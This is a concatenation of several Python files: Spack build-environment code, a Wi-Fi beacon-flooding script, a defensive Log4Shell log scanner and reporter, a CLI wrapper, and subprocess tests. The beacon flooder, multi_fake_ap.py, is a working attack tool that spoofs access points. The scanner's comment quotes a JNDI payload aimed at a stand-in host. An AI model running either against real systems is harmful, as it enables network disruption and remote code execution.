compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
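# Usage sketch (illustrative only; library names and versions are examples): from
# a package's install() method, via the module-scope wrapper set up in
# _set_variables_for_single_module:
#
#     static_to_shared_library('libfoo.a', version='1.2.3', compat_version='1')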
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return list(dedupe(filter_system_paths(rpaths)))
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
build_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, build_env)
set_build_environment_variables(pkg, build_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, build_env)
build_env.extend(
modifications_from_dependencies(pkg.spec, context='build')
)
if (not dirty) and (not build_env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
set_module_variables_for_package(pkg)
pkg.setup_build_environment(build_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the build_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
# kludge to handle cray libsci being automatically loaded by PrgEnv
# modules on cray platform. Module unload does no damage when
# unnecessary
module('unload', 'cray-libsci')
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
implicit_rpaths = pkg.compiler.implicit_rpaths()
if implicit_rpaths:
build_env.set('SPACK_COMPILER_IMPLICIT_RPATHS',
':'.join(implicit_rpaths))
# Make sure nothing's strange about the Spack environment.
validate(build_env, tty.warn)
build_env.apply_modifications()
def modifications_from_dependencies(spec, context):
"""Returns the environment modifications that are required by
the dependencies of a spec and also applies modifications
to this spec's package at module scope, if need be.
Args:
spec (Spec): spec for which we want the modifications
context (str): either 'build' for build-time modifications or 'run'
for run-time modifications
"""
env = EnvironmentModifications()
pkg = spec.package
# Maps the context to deptype and method to be called
deptype_and_method = {
'build': (('build', 'link', 'test'),
'setup_dependent_build_environment'),
'run': (('link', 'run'), 'setup_dependent_run_environment')
}
deptype, method = deptype_and_method[context]
for dspec in spec.traverse(order='post', root=False, deptype=deptype):
dpkg = dspec.package
set_module_variables_for_package(dpkg)
# Allow dependencies to modify the module
dpkg.setup_dependent_package(pkg.module, spec)
getattr(dpkg, method)(env, spec)
return env
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopPhase as e:
# Do not create a full ChildError from this, it's not an error
# it's a control statement.
child_pipe.send(e)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# If returns a StopPhase, raise it
if isinstance(child_result, StopPhase):
# do not print
raise child_result
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
if isinstance(child_result, ChildError):
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
    Any subclass of InstallError will be annotated by Spack with a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
            # The error happened in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s\n' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
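# The __reduce__/_make_child_error pair above is what lets a ChildError cross
# the multiprocessing.Pipe between the child build process and the parent.
# A minimal sketch of that round-trip (illustrative values only; the real flow
# goes through child_pipe.send() in fork()):
#
#   import pickle
#   err = ChildError("cmake failed", "spack.util.executable", "ProcessError",
#                    "traceback text", "/tmp/spack-build.log", ["  >> bad line"])
#   clone = pickle.loads(pickle.dumps(err))   # reconstructed via _make_child_error(...)
#   assert clone.name == "ProcessError" and clone.build_log == err.build_log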
class StopPhase(spack.error.SpackError):
"""Pickle-able exception to control stopped builds."""
def __reduce__(self):
return _make_stop_phase, (self.message, self.long_message)
def _make_stop_phase(msg, long_msg):
return StopPhase(msg, long_msg)
|
multi_fake_ap.py
|
import os
import sys
os.system("clear")
import pyfiglet
print (chr(27)+"[36m")
banner = pyfiglet.figlet_format("Multi Fake AP ")
print (banner)
print (" Author : Rahat Khan Tusar(RKT)")
print (" Github : https;//github.com/r3k4t")
from scapy.all import *
from threading import Thread
from faker import Faker
resp =input("""\nPlease,select your option :
1.Wireless Acess Points(APs) 802.11 ===> 2
2.Wireless Acess Points(APs) 802.11 ===> 4
3.Wireless Acess Points(APs) 802.11 ===> 5
4.Wireless Acess Points(APs) 802.11 ===> 10\n """)
print ("You have selected option :",resp)
if resp == '1':
def send_beacon(ssid,mac,infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
# ESS+privacy to appear as secured on some devices
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
if __name__ == "__main__":
# number of access points
rkt_ap = 2
interface = input("Enter interface(Example:wlp2s0,wlan0,enp0s3 etc) : ")
os.system("sudo airmon-ng start {}".format(interface))
iface = input("Enter interface(Example:wlp2s0mon,wlan0mon,enp0s3mon etc) : ")
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(rkt_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
elif resp == '2':
def send_beacon(ssid,mac,infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
# ESS+privacy to appear as secured on some devices
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
if __name__ == "__main__":
# number of access points
rkt_ap = 4
interface = input("Enter interface(Example:wlp2s0,wlan0,enp0s3 etc) : ")
os.system("sudo airmon-ng start {}".format(interface))
iface = input("Enter interface(Example:wlp2s0mon,wlan0mon,enp0s3mon etc) : ")
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(rkt_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
elif resp == '3':
def send_beacon(ssid,mac,infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
# ESS+privacy to appear as secured on some devices
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
if __name__ == "__main__":
# number of access points
rkt_ap = 5
interface = input("Enter interface(Example:wlp2s0,wlan0,enp0s3 etc) : ")
os.system("sudo airmon-ng start {}".format(interface))
iface = input("Enter interface(Example:wlp2s0mon,wlan0mon,enp0s3mon etc) : ")
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(rkt_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
elif resp == '4':
def send_beacon(ssid,mac,infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
if __name__ == "__main__":
# number of access points
rkt_ap = 10
interface = input("Enter interface(Example:wlp2s0,wlan0,enp0s3 etc) : ")
os.system("sudo airmon-ng start {}".format(interface))
iface = input("Enter interface(Example:wlp2s0mon,wlan0mon,enp0s3mon etc) : ")
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(rkt_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
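# The four menu branches above differ only in the number of access points to
# spoof. A possible refactor (a sketch, not part of the original tool) would
# map the choice to a count and keep a single send_beacon definition together
# with the same interface / airmon-ng prompts used above:
#
#   ap_counts = {'1': 2, '2': 4, '3': 5, '4': 10}
#   rkt_ap = ap_counts.get(resp)
#   if rkt_ap is None:
#       sys.exit("Invalid option")
#   faker = Faker()
#   for ssid, mac in [(faker.name(), faker.mac_address()) for _ in range(rkt_ap)]:
#       Thread(target=send_beacon, args=(ssid, mac)).start()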
|
jndiRep.py
|
#!/usr/bin/env python
from shutil import get_terminal_size
from time import time, ctime
import subprocess
import threading
import requests
import argparse
import base64
import json
import sys
import re
import os
paths = []
findings = []
WIDTH = get_terminal_size().columns
RED = "\x1b[31m"
GREEN = "\x1b[32m"
CYAN = "\x1b[36m"
RESET = "\x1b[0m"
BOLD = "\x1b[1m"
IP_RE = re.compile(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}')
LOG_RE = re.compile(r'\d+\s(/.*\.log\.*)')
FILTER = [b"jndiRep"]
url = 'https://api.abuseipdb.com/api/v2/report'
class JNDI:
def __init__(self, path: str, lines: list):
self.path = path
self.lines = lines
def prompt():
print(f"{RED} __ {CYAN} __ __ ______ {RESET}")
print(f"{RED} |__|{CYAN}.-----.--| |__| __ \.-----.-----.{RESET}")
print(f"{RED} | |{CYAN}| | _ | | <| -__| _ |{RESET}")
print(f"{RED} | |{CYAN}|__|__|_____|__|___|__||_____| __|{RESET}")
print(f"{RED}|___|{CYAN} |__| {RESET}")
print(f"{RED} (c) 2021{GREEN} - Jakob Schaffarczyk{RESET}\n")
def error(msg: str):
msg = msg.replace("\n", "\n ")
print(f"{RED}[!]{RESET} {msg}")
sys.exit(1)
def info(msg: str):
msg = msg.replace("\n", "\n ")
print(f"{GREEN}[i]{RESET} {msg}")
def progress(size: int):
prog = round(50/size*(size-len(paths)))
msg = f"Progress: [{prog*'#'}{(50-prog)*' '}] {size-len(paths)}/{size}"
msg += (WIDTH-len(msg)) * ' '
print(msg, end='\r')
def decode_payload(log: str) -> bytes:
payload = b""
if b"Base64" in log:
payload = base64.decodebytes(log.split(b"Base64/")[1].split(b"}")[0])
elif b"${lower" in log or b"${upper" in log:
log = b'$' + b'$'.join(log.split(b"$")[1:])[:-1]
payload = re.sub(r'\$\{\w+:(\w+)\}', r"\1", log.decode()).encode()
return payload
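# decode_payload() covers the two obfuscation styles commonly seen in log4shell
# probes: a Base64 command embedded in the JNDI string, and ${lower:}/${upper:}
# wrappers around the keyword. An illustrative call (hypothetical log line, not
# taken from a real capture):
#
#   decode_payload(b"${jndi:ldap://evil.example/Basic/Command/Base64/dG91Y2ggL3RtcC9wd24=}")
#   # -> b'touch /tmp/pwn'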
def run(size: int, grep: str):
while len(paths) != 0:
path = paths.pop()
progress(size)
try:
scan_file(path, grep)
except FileNotFoundError:
pass
except Exception as e:
error(
str(e) + "\nPlease file an issue at https://github.com/js-on/jndiRep/issues")
def scan_docker(grep: str):
ps = subprocess.check_output(["docker", "ps"]).splitlines()[1:]
container_ids = [container.decode().split(" ")[0] for container in ps]
container_names = [container.decode().split(" ")[-1] for container in ps]
grep = grep.encode()
cnt = 1
for cid, cname in zip(container_ids, container_names):
info(f"Scanning #{cid} - ({cnt}/{len(container_ids)})")
res = subprocess.check_output(
["docker", "logs", cid], stderr=subprocess.DEVNULL)
res = res.splitlines()
log = []
for line in res:
if grep in line:
for filter in FILTER:
if filter in line:
return
t = line.strip()
payload = decode_payload(t)
if payload != b"":
t += b"\nPayload: " + payload
log.append(t)
if len(log) != 0:
findings.append(JNDI(path=f"{cname}", lines=log))
cnt += 1
def scan_log(jobs: int, grep: str):
global paths
info("Scanning system with lsof")
data = subprocess.check_output(
["lsof"], stderr=subprocess.DEVNULL).splitlines()
paths = [line for line in data if b".log" in line]
paths = [re.findall(LOG_RE, p.decode())[0] for p in paths]
paths = list(set(paths))
size = len(paths)
if size < jobs:
jobs = size
procs = []
info(
f"Found {size} log files.\nSpawning {jobs} threads\nStart at {ctime(time())}")
for i in range(jobs):
procs.append(threading.Thread(target=run, args=(size, grep)))
for proc in procs:
proc.start()
for proc in procs:
proc.join()
print()
info(f"Stop at {ctime(time())}")
def scan_directory(directory: str, jobs: int, grep: str):
for root, _, files in os.walk(directory):
for name in files:
fname = os.path.join(root, name)
paths.append(fname)
procs = []
size = len(paths)
if size < jobs:
jobs = size
info(f"Spawning {jobs} threads\nStart at {ctime(time())}")
for i in range(jobs):
procs.append(threading.Thread(target=run, args=(size, grep)))
for proc in procs:
proc.start()
for proc in procs:
proc.join()
print()
info(f"Stop at {ctime(time())}")
def scan_file(path: str, grep: str):
log = []
with open(path, "rb") as f:
grep = grep.encode()
for line in f:
if grep in line:
for filter in FILTER:
if filter in line:
return
t = line.strip()
payload = decode_payload(t)
if payload != b"":
t += b"\nPayload: " + payload
log.append(t)
if len(log) != 0:
findings.append(JNDI(path=path, lines=log))
def write_findings(output: str):
print()
if output.endswith(".json"):
info("Store findings in JSON format")
data = {}
for finding in findings:
data[finding.path] = [line.decode() for line in finding.lines]
json.dump(data, open(output, "w"), indent=4)
elif output.endswith(".csv"):
info("Store findings in CSV format\nInfo: \"|\" is used as separator!")
with open(output, "w") as f:
f.write("File|Log|Payload\n")
for finding in findings:
for line in finding.lines:
line = line.decode()
if "\nPayload: " in line:
payload = line.split("\nPayload: ")[1]
line = line.split("\nPayload: ")[0]
else:
payload = ""
t = f"{finding.path}|{line}|{payload}\n"
f.write(t)
else:
with open(output, "w") as f:
for finding in findings:
f.write(f"{finding.path}\n")
for line in finding.lines:
# print(line)
f.write(f"{line.decode()}\n")
f.write("\n")
info(f"Findings written to {output}")
def print_findings():
for finding in findings:
print(f"\n{BOLD}=== {finding.path} ==={RESET}")
for log in finding.lines:
try:
log = log.decode()
ips = IP_RE.findall(log)
for ip in ips:
log = log.replace(ip, f"{GREEN}{ip}{RESET}")
log = log.replace("Payload", f"{RED}Payload{RESET}")
print(log, end="\n\n")
except:
print(log, end="\nn")
def report(api_key: str, include_logs: bool, comment: str, dedup: bool):
headers = {
"Accept": "application/json",
"Key": api_key
}
ips = []
for finding in findings:
for line in finding.lines:
line = line.decode()
msg = comment
# ip = line.split(" ")[0]
try:
ip = IP_RE.findall(line)[0]
except:
continue
# Deduplication of reports
if dedup:
if ip in ips:
continue
else:
ips.append(ip)
if include_logs:
log = line[line.index("["):].split("\nPayload: ")[0]
msg += " - " + log
data = {
"ip": ip,
"categories": "21",
"comment": msg
}
res = requests.request(
method='POST', url=url, headers=headers, params=data)
if res.status_code // 100 == 4:
error(res.text)
else:
info(res.text)
def main():
prompt()
ap = argparse.ArgumentParser()
ap.add_argument("-a", "--api-key",
type=str, help="AbuseIPDB Api Key")
ap.add_argument("-d", "--directory", type=str, help="Directory to scan")
ap.add_argument("-f", "--file", type=str, help="File to scan")
ap.add_argument("-l", "--logs", action="store_true",
help="Use `lsof` to find all .log files and scan them")
ap.add_argument("-D", "--docker", action="store_true",
help="Inspect running containers and scan for log4j activity")
ap.add_argument("-g", "--grep", type=str,
help="Custom word to grep for", default="jndi")
ap.add_argument("-i", "--ignore", type=str, default="",
help="Custom words to ignore (grep -v)")
ap.add_argument("-o", "--output", type=str,
help="File to store results. stdout if not set. Use .csv|.json extension for automatic data formatting", default=None)
ap.add_argument("-t", "--threads", type=int,
help="Number of threads to start. Default is 4", default=4)
ap.add_argument("-r", "--report", action="store_true",
help="Report IPs to AbuseIPDB with category 21 (malicious web request)", default=False)
ap.add_argument("-c", "--comment", type=str, help="Comment sent with your report",
default="Request related to CVE-2021-44228")
ap.add_argument("-I", "--include-logs", action="store_true", default=False,
help="Include logs in your report. PII will NOT be stripped of!!!")
ap.add_argument("--no-dedup", action="store_true", default=False,
help="If set, report every occurrence of IP. Default: Report only once.")
args = ap.parse_args(sys.argv[1:])
if not os.getuid() == 0:
error("jndiRep must be run as superuser")
if args.report:
if not args.api_key:
error("Api Key is required. (-a, --api-key)")
if args.ignore:
for filter in args.ignore.split(","):
FILTER.append(filter.encode())
if args.logs:
scan_log(args.threads, args.grep)
elif args.docker:
scan_docker(args.grep)
elif args.directory:
scan_directory(os.path.join(os.getcwd(), args.directory),
args.threads, args.grep)
elif args.file:
scan_file(os.path.join(args.file), args.grep)
else:
error("Either (-f) or (-d) or (-l) is required.")
file_cnt = len(findings)
log_cnt = sum([len(finding.lines) for finding in findings])
info(f"Found {log_cnt} log entries in {file_cnt} files")
if args.output:
write_findings(os.path.join(os.getcwd(), args.output))
else:
print_findings()
if args.report:
report(args.api_key, args.include_logs,
args.comment, not args.no_dedup)
if __name__ == "__main__":
main()
|
fire_cli.py
|
import sys
import threading
import uuid
from io import StringIO
import fire
from dukepy.fire.fire_root import Root
from dukepy.traces import print_exception_traces
from dukepy.fire.fire_command import FireCommand
fire_threads = []
def db_fire_cmd(cmd, source):
def act():
try:
req = FireCommand(cmd=cmd, source=source)
req.save()
except Exception as e:
print_exception_traces(e)
    t = threading.Thread(target=act)
t.start()
def main():
if len(sys.argv) > 1:
args = ""
for arg in sys.argv[1:]:
args += " " + arg
try:
db_fire_cmd(args, "cli")
fire.Fire(Root, args)
except Exception as e:
print_exception_traces(e)
Root.cmd_history.append(args)
else:
print("no args...")
# while True:
# cmd = input()
# fire.Fire(Root, cmd)
# Root.cmd_history.append(cmd)
pass
def fire_task_wrapper(cmd, emit, req_id=None):
class TeeIn(StringIO):
def write(self, s):
# print("fire out" + str(s))
try:
emit('fireout', {'stdin': s, 'req_id': req_id})
# StringIO.write(self, s)
# sys.__stdin__.write(s)
except Exception as e:
# print_exception_traces(e)
pass
class TeeOut(StringIO):
def write(self, s):
# print("fire out" + str(s))
try:
emit('fireout', {'stdout': s, 'req_id': req_id})
# StringIO.write(self, s)
# sys.__stdout__.write(s)
except Exception as e:
# print_exception_traces(e)
pass
class TeeErr(StringIO):
def write(self, s):
# print("fire out" + str(s))
try:
emit('fireout', {'stderr': s, 'req_id': req_id})
# StringIO.write(self, s)
# sys.__stderr__.write(s)
except Exception as e:
# print_exception_traces(e)
pass
# @processify
def fire_task(command):
db_fire_cmd(command, "websocket")
# Save everything that would otherwise go to stdout.
stdin = TeeIn()
sys.stdin = stdin
stdout = TeeOut()
sys.stdout = stdout
stderr = TeeErr()
sys.stderr = stderr
fire.Fire(Root, command)
pass
# fire_task(cmd)
    t = threading.Thread(name='fire_' + str(uuid.uuid4()), target=fire_task, args=(cmd,))
fire_threads.append(t)
t.start()
# t.join()
pass
if __name__ == "__main__":
main()
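# fire_task_wrapper() is meant to be driven from a websocket handler: the
# caller supplies an emit callback, and every chunk written to stdin/stdout/
# stderr while python-fire runs is forwarded as a 'fireout' event keyed by
# req_id. A hedged usage sketch (the command string and callback below are
# made up for illustration; in practice emit would be e.g. Flask-SocketIO's
# emit):
#
#   def emit(event, payload):
#       print(event, payload)          # stand-in for socketio.emit
#
#   fire_task_wrapper("status --verbose", emit, req_id="abc123")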
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import platform
import signal
import io
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import gc
import textwrap
try:
import ctypes
except ImportError:
ctypes = None
else:
import ctypes.util
try:
import threading
except ImportError:
threading = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
self.doCleanups()
support.reap_children()
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
